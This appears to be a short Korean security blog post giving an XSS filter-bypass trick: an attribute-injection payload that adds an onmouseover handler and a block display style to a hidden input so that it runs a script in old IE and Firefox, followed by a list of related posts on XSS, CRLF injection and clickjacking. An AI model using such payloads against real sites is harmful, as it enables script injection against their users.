type에 hidden 속성을 갖고 있으며 <, > 태그를 필터링하고 있을 경우.

<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />

IE6, 7, 8 혹은 FireFox

Good Luck~ :-)

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cross-Site Scripting vulnerability with JavaScript and JQuery  (0) 2011.10.18
XSS: Cross-site Scripting  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox
l